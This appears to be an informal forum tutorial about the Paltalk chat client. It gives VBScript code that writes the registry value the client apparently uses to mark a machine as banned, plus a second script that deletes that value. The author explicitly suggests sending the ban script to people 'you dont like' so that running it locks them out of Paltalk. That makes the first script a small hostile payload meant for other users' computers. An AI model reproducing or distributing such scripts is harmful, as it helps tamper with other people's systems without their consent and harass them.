ok this is just for fun , paltalk add registry value in your Computer when they ban you the name of it is "pgnumber" and the value they use " 1,2 ,3 ,4,5" so it look somthink like:
"HKEY_CURRENT_USER\Software\Microsoft\NSPlugins\pgnumber", 00000005, "REG_DWORD"
now what we gona do is Create that entry and give it value in registry using WS Script
Open notepad and Copy and paste the Script below
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\NSPlugins\pgnumber", 00000005, "REG_DWORD"
MsgBox "You have been baned!",, "baned!"
now save it as make sure you select All files from save as type and give it a name with extension .vbs
somthing like "ban.vbs" ,click the file you saved you will get msg saying "You have been baned!" now try to log to paltalk and see if you get a msg from paltalk saying " This account bla bla (tc5605)"
now you can send the Script file to ppl you dont like in paltalk.
Next lets do the unbanning
all we need to do is make Script to Delete the Key in registry ,copy and paste the Script in notepad
Dim WshShell, pgnumber
Set WshShell = WScript.CreateObject("WScript.Shell")
pgnumber = "HKEY_CURRENT_USER\Software\Microsoft\NSPlugins\pgnumber"
wshShell.RegDelete pgnumber
MsgBox "You have been ubaned!",, "ubaned!"
do the same steps as the first script ,it should remove the ban ,for windows Vista Run it as Admin.




